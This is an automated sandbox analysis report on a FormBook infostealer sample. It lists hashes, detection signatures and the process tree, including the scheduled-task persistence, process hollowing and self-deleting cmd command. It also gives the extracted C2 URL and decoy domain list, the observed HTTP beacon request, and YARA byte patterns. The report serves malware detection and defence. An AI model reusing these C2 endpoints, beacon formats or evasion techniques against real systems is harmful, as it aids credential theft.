Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 456yqMyHvT.exe

Overview

General Information

Sample Name:456yqMyHvT.exe
Analysis ID:491397
MD5:001122f11ae95a3c00eb3e76541bc264
SHA1:750e1254a82c6e21ab5cfba176363f0112089f65
SHA256:b25ef1151578640a5bb9e01fada60a8792fc4d3e92f3ddabf19ba4cd6d630f57
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 456yqMyHvT.exe (PID: 6332 cmdline: 'C:\Users\user\Desktop\456yqMyHvT.exe' MD5: 001122F11AE95A3C00EB3E76541BC264)
    • schtasks.exe (PID: 6564 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 456yqMyHvT.exe (PID: 5188 cmdline: C:\Users\user\Desktop\456yqMyHvT.exe MD5: 001122F11AE95A3C00EB3E76541BC264)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 3040 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 2440 cmdline: /c del 'C:\Users\user\Desktop\456yqMyHvT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.themmbcollection.com/gst0/"], "decoy": ["retrokiid.com", "aoute.net", "rozkayinc.com", "botjin.link", "takipyurticikargo.com", "yowworld.com", "ladpharmacy.com", "tuonglaimaaai.xyz", "baiteying.com", "dumpstersforrehabbers.com", "nebrickface.com", "210wscottstj.info", "cavuleadershippro.com", "knoubank.com", "chefdoeuvre-delamere.com", "dcspores.com", "fzzwbjq.com", "buycialishaonlinerx.com", "brulkikkr.com", "catclubauvergne.com", "comounidad.com", "noseysneighbors.com", "binghareeb.com", "icenami.com", "xlcedd08185scea.xyz", "mapleleafdryers.com", "online-jahrescoaching.com", "reform-community.com", "mdf-panels.com", "beststorestore.com", "sxtynines.com", "diasporapath.com", "qbluedottvwdbuy.com", "simplyspringhomestead.com", "poctamontpg.com", "rebelyellcommunity.com", "sureshotimages.com", "ycdlg.com", "yhyyjx.com", "bikamobidika2.xyz", "jonotamedia.com", "kolliwebsolutions.net", "twilektalk.com", "creditcardsthinfo.com", "cecevintage.com", "sjkimtkd.com", "andrei68marketing.com", "teeupproducts.com", "tlhxj.com", "dyq365.com", "sidraracing.com", "muktirmichil.com", "desireezzplus.com", "mayabeautyproducts.com", "gateleess.net", "hngxqwozw.icu", "tenerus.info", "gxbei.com", "suachuanha.xyz", "progressivepulse.net", "zaborski.pro", "lancasterspiritco.com", "endlvl.com", "billinginfoservice.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 20 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.456yqMyHvT.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.456yqMyHvT.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.456yqMyHvT.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.456yqMyHvT.exe.41fe970.5.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.456yqMyHvT.exe.41fe970.5.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x162018:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x162292:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x16ddc5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x16d8b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x16dec7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x16e03f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x162caa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x16cb2c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x1639a3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x174037:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x17503a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 11 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.themmbcollection.com/gst0/"], "decoy": ["retrokiid.com", "aoute.net", "rozkayinc.com", "botjin.link", "takipyurticikargo.com", "yowworld.com", "ladpharmacy.com", "tuonglaimaaai.xyz", "baiteying.com", "dumpstersforrehabbers.com", "nebrickface.com", "210wscottstj.info", "cavuleadershippro.com", "knoubank.com", "chefdoeuvre-delamere.com", "dcspores.com", "fzzwbjq.com", "buycialishaonlinerx.com", "brulkikkr.com", "catclubauvergne.com", "comounidad.com", "noseysneighbors.com", "binghareeb.com", "icenami.com", "xlcedd08185scea.xyz", "mapleleafdryers.com", "online-jahrescoaching.com", "reform-community.com", "mdf-panels.com", "beststorestore.com", "sxtynines.com", "diasporapath.com", "qbluedottvwdbuy.com", "simplyspringhomestead.com", "poctamontpg.com", "rebelyellcommunity.com", "sureshotimages.com", "ycdlg.com", "yhyyjx.com", "bikamobidika2.xyz", "jonotamedia.com", "kolliwebsolutions.net", "twilektalk.com", "creditcardsthinfo.com", "cecevintage.com", "sjkimtkd.com", "andrei68marketing.com", "teeupproducts.com", "tlhxj.com", "dyq365.com", "sidraracing.com", "muktirmichil.com", "desireezzplus.com", "mayabeautyproducts.com", "gateleess.net", "hngxqwozw.icu", "tenerus.info", "gxbei.com", "suachuanha.xyz", "progressivepulse.net", "zaborski.pro", "lancasterspiritco.com", "endlvl.com", "billinginfoservice.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 456yqMyHvT.exeVirustotal: Detection: 32%Perma Link
          Source: 456yqMyHvT.exeReversingLabs: Detection: 33%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\dWAzsHjHs.exeReversingLabs: Detection: 33%
          Source: 7.2.456yqMyHvT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\456yqMyHvT.exeUnpacked PE file: 0.2.456yqMyHvT.exe.d20000.0.unpack
          Source: 456yqMyHvT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 456yqMyHvT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: WWAHost.pdb source: 456yqMyHvT.exe, 00000007.00000002.800543926.0000000003270000.00000040.00020000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: 456yqMyHvT.exe, 00000007.00000002.800543926.0000000003270000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 456yqMyHvT.exe, 00000007.00000002.798568898.00000000013BF000.00000040.00000001.sdmp, WWAHost.exe, 0000000F.00000002.925469842.0000000003D1F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 456yqMyHvT.exe, 00000007.00000002.798568898.00000000013BF000.00000040.00000001.sdmp, WWAHost.exe
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 91.237.52.145 80
          Source: C:\Windows\explorer.exeDomain query: www.zaborski.pro
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.themmbcollection.com/gst0/
          Source: global trafficHTTP traffic detected: GET /gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIb HTTP/1.1Host: www.zaborski.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpString found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 456yqMyHvT.exe, 00000000.00000002.708807508.0000000009712000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: WWAHost.exe, 0000000F.00000002.926336110.00000000046BF000.00000004.00020000.sdmpString found in binary or memory: https://www.zaborski.pro/gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RB
          Source: unknownDNS traffic detected: queries for: www.zaborski.pro
          Source: global trafficHTTP traffic detected: GET /gst0/?5jqLW=E2h0umA4e4YA7SaSgMuwd93jbjdDHroZn//SRLFoqGeMMw9kEwbocgJYh4hB9RBnaKwy&m2M0a=aZq8yroxIb HTTP/1.1Host: www.zaborski.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 456yqMyHvT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.456yqMyHvT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.456yqMyHvT.exe.41fe970.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
